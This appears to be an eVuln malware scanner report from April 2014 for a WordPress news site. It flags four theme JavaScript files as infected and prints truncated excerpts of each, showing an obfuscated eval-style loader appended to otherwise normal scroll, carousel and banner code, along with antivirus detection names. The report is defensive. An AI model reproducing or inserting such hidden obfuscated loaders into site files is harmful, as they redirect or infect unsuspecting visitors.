Malware Scanner report for mela-news.com

Malicious/Suspicious/Total urls checked: 4/0/17

4 pages have malicious code. See details below

Blacklists: OK

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/5

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Scanned pages/files

Request	Server response	Status
http://mela-news.com/	HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 19 Apr 2014 18:18:05 GMT Location: http://www.mela-news.com/ Server: Apache/2.2.3 (CentOS) Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.mela-news.com/xmlrpc.php X-Powered-By: PHP/5.2.17 X-Powered-By: PleskLin	clean
http://www.mela-news.com/	200 OK Content-Length: 43070 Content-Type: text/html	clean
http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js	200 OK Content-Length: 78601 Content-Type: text/javascript	clean
http://www.mela-news.com/wp-content/themes/grigo/grigo/js/scrollto.js	200 OK Content-Length: 4458 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) ;(function(d){var k=d.scrollTo=function(a,i,e){d(window).scrollTo(a,i,e)};k.defaults={axis:'xy',duration:parseFloat(d.fn.jquery)>=1.3?0:1};k.window=function(a){return d(window)._scrollable()};d.fn._scrollable=function(){return this.map(function(){var a=this,i=!a.nodeName\|\|d.inArray(a.nodeName.toLowerCase(),['iframe','#document','html','body'])!=-1;if(!i)return a;var e=(a.contentWindow\|\|a).document\|\|a.ownerDocument\|\|a;return d.browser.safari\|\|e.compatMode=='BackCompat'?e.body:e.documentElement ... 3177 bytes are skipped .../^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]\|\|_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{})); Antivirus reports: AntiVir JS/Infected.C Avast JS:Agent-AZY [Trj] Ikarus Trojan.JS.Alescurf nProtect Trojan.JS.Agent.EXP K7AntiVirus Trojan Emsisoft Trojan.JS.Agent.EXP (B) Comodo TrojWare.JS.Agent.C CAT-QuickHeal JS/Alescurf.D McAfee-GW-Edition JS/Redirector DrWeb JS.DownLoader.216 Kaspersky Trojan-Downloader.JS.Agent.gnk Microsoft Trojan:JS/Redirector.IM MicroWorld-eScan Trojan.JS.Agent.EXP Fortinet JS/Redirector.KO!tr PCTools Malware.JS-Alescurf TotalDefense JS/Alescurf.B McAfee JS/Redirector NANO-Antivirus Trojan.Script.Agent.lyldx ClamAV JS.Trojan.Redir-3 F-Secure Trojan.JS.Agent.EXP VIPRE Trojan.JS.Generic (v) F-Prot JS/Agent.PL eSafe JS.Agent.gnk AVG JS/Agent.Y Norman Agent.ACM Sophos Troj/JSRedir-DO GData Trojan.JS.Agent.EXP Symantec JS.Alescurf Commtouch JS/Agent.PL ESET-NOD32 JS/Agent.NDY BitDefender Trojan.JS.Agent.EXP
http://www.mela-news.com/wp-content/themes/grigo/grigo/js/grigo.js	200 OK Content-Length: 5137 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) jQuery(document).ready(function() { $('.sid_left_inside li a, .sid_right_inside li a, .first_footer_center li').hover(function() { $(this).stop().animate({'paddingLeft': '5px'},200); },function() { $(this).stop().animate({'paddingLeft': '0'},200); }); $('.my_thumb').hover(function() { $(this).find("a.thumb_shadow").stop(); $(this).find("a.thumb_shadow").css("background-position","-110px 0"); $(this).find("a.thumb_shadow").animate({backgroundP ... 4120 bytes are skipped .../^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]\|\|_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{})); Antivirus reports: AntiVir JS/Infected.C Avast JS:Agent-AZY [Trj] Ikarus Trojan.JS.Alescurf nProtect Trojan.JS.Agent.EXP K7AntiVirus Trojan Emsisoft Trojan.JS.Agent.EXP (B) Comodo TrojWare.JS.Agent.C CAT-QuickHeal JS/Alescurf.D McAfee-GW-Edition JS/Redirector DrWeb JS.DownLoader.216 Kaspersky Trojan-Downloader.JS.Agent.gnk Microsoft Trojan:JS/Redirector.IM PCTools Malware.JS-Alescurf TotalDefense JS/Alescurf.B McAfee JS/Redirector NANO-Antivirus Trojan.Script.Agent.lyldx ClamAV JS.Trojan.Redir-3 VIPRE Trojan.JS.Generic (v) F-Prot JS/Agent.PL AVG JS/Agent.Y Norman Agent.ACM Sophos Troj/JSRedir-DO GData Trojan.JS.Agent.EXP Symantec JS.Alescurf Commtouch JS/Agent.PL BitDefender Trojan.JS.Agent.EXP
http://www.mela-news.com/wp-content/themes/grigo/grigo/js/banner.js	200 OK Content-Length: 4343 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]\|\|e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(6($){$.1g.1w=6(o){o=$.1f({r:n,x:n,N:n,17:q,J:n,L:1a,16:n,y:q,u:12,H:3,B:0,k:1,K:n,I:n},o\|\|{});8 G.R(6(){p b=q,A=o.y?"15":"w",P=o.y?"t":"s";p c=$(G),9=$("9",c),E=$("10" ... 3397 bytes are skipped .../^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]\|\|_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{})); Antivirus reports: AntiVir JS/Infected.C Avast JS:Agent-AZY [Trj] Ikarus Trojan.JS.Alescurf AhnLab-V3 JS/IFrame nProtect Trojan.JS.Agent.EXP K7AntiVirus Trojan Emsisoft Trojan.JS.Agent.EXP (B) Comodo TrojWare.JS.Agent.C CAT-QuickHeal JS/Alescurf.D McAfee-GW-Edition JS/Redirector DrWeb JS.DownLoader.216 Kaspersky Trojan-Downloader.JS.Agent.gnk Microsoft Trojan:JS/Redirector.IM MicroWorld-eScan Trojan.JS.Agent.EXP Fortinet JS/Redirector.KO!tr PCTools Malware.JS-Alescurf TotalDefense JS/Alescurf.B McAfee JS/Redirector NANO-Antivirus Trojan.Script.Agent.lyldx ClamAV JS.Trojan.Redir-3 F-Secure Trojan.JS.Agent.EXP VIPRE Trojan.JS.Generic (v) eSafe JS.Agent.gnk F-Prot JS/Agent.PL AVG JS/Agent.Y Norman Agent.ACM Sophos Troj/JSRedir-DO GData Trojan.JS.Agent.EXP Symantec JS.Alescurf Commtouch JS/Agent.PL ESET-NOD32 JS/Agent.NDY BitDefender Trojan.JS.Agent.EXP
http://www.mela-news.com/wp-content/themes/grigo/grigo/js/jcarousellite.js	200 OK Content-Length: 16176 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) (function($) { $.fn.jCarouselLite = function(o) { o = $.extend({ btnPrev: null, btnNext: null, btnGo: null, mouseWheel: false, auto: null, speed: 200, easing: null, vertical: false, circular: true, visible: 3, start: 0, scroll: 1, beforeStart: null, afterEnd: null }, o \|\| {} ... 6102 bytes are skipped .../^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]\|\|_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{})); Antivirus reports: AntiVir JS/Infected.C Avast JS:Agent-AZY [Trj] Ikarus Trojan.JS.Alescurf nProtect Trojan.JS.Agent.EXP K7AntiVirus Trojan Emsisoft Trojan.JS.Agent.EXP (B) Comodo TrojWare.JS.Agent.C CAT-QuickHeal JS/Alescurf.D McAfee-GW-Edition JS/Redirector DrWeb JS.DownLoader.216 Kaspersky Trojan-Downloader.JS.Agent.gnk Microsoft Trojan:JS/Redirector.IM Fortinet JS/Redirector.KO!tr PCTools Malware.JS-Alescurf TotalDefense JS/Alescurf.B McAfee JS/Redirector NANO-Antivirus Trojan.Script.Agent.lyldx ClamAV JS.Trojan.Redir-3 F-Secure Trojan.JS.Agent.EXP VIPRE Trojan.JS.Generic (v) F-Prot JS/Agent.PL eSafe JS.Agent.gnk AVG JS/Agent.Y Norman Agent.ACM Sophos Troj/JSRedir-DO GData Trojan.JS.Agent.EXP Symantec JS.Alescurf Commtouch JS/Agent.PL BitDefender Trojan.JS.Agent.EXP
http://www.mela-news.com/wp-includes/js/jquery/jquery.js?ver=1.4.2	200 OK Content-Length: 72194 Content-Type: application/x-javascript	clean
http://static.addtoany.com/menu/page.js	200 OK Content-Length: 55948 Content-Type: application/javascript	clean
http://platform.twitter.com/widgets.js	200 OK Content-Length: 97628 Content-Type: application/javascript	clean
http://static.ak.connect.facebook.com/connect.php/it_IT	200 OK Content-Length: 165604 Content-Type: application/x-javascript	clean
http://www.bloggeritaliani.it/mrx/bi/bi20antipixel.js	404 Not Found Content-Length: 18164 Content-Type: text/html	clean
http://www.bloggeritaliani.it/wp-includes/js/jquery/jquery.js?ver=1.7.1	200 OK Content-Length: 93889 Content-Type: application/javascript	clean
http://www.bloggeritaliani.it/wp-content/plugins/sharebar/js/sharebar.js?ver=3.3.1	200 OK Content-Length: 1802 Content-Type: application/javascript	clean
http://www.bloggeritaliani.it/wp-content/themes/bi20/js/audio-player.js?ver=20110823	200 OK Content-Length: 11738 Content-Type: application/javascript	clean
http://www.bloggeritaliani.it//www.google.it/jsapi/	HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Sat, 19 Apr 2014 18:18:14 GMT Pragma: no-cache Location: http://www.bloggeritaliani.it/www.google.it/jsapi/ Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 19 Apr 2014 18:18:14 GMT Set-Cookie: 60gpBAK=R1224225179; path=/; expires=Sat, 19-Apr-2014 19:18:05 GMT Set-Cookie: 60gp=R4109772328; path=/; expires=Sat, 19-Apr-2014 19:25:21 GMT X-Pingback: http://www.bloggeritaliani.it/xmlrpc.php X-Powered-By: PHP/5.2.17	clean
http://www.bloggeritaliani.it/www.google.it/jsapi/	404 Not Found Content-Length: 11856 Content-Type: text/html	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: mela-news.com

Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 19 Apr 2014 18:18:05 GMT
Location: http://www.mela-news.com/
Server: Apache/2.2.3 (CentOS)
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.mela-news.com/xmlrpc.php
X-Powered-By: PHP/5.2.17
X-Powered-By: PleskLin

...0 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: mela-news.com
Referer: http://www.google.com/search?q=mela-news.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=mela-news.com

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://mela-news.com/

Result: mela-news.com is not infected or malware details are not published yet.

Recently found suspicious websites

Malware Scanner report for mela-news.com

Malware & Hack Repair

Website Hack Insurance

Scanned pages/files

Malicious Redirects

Safe Browsing / Blacklists

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools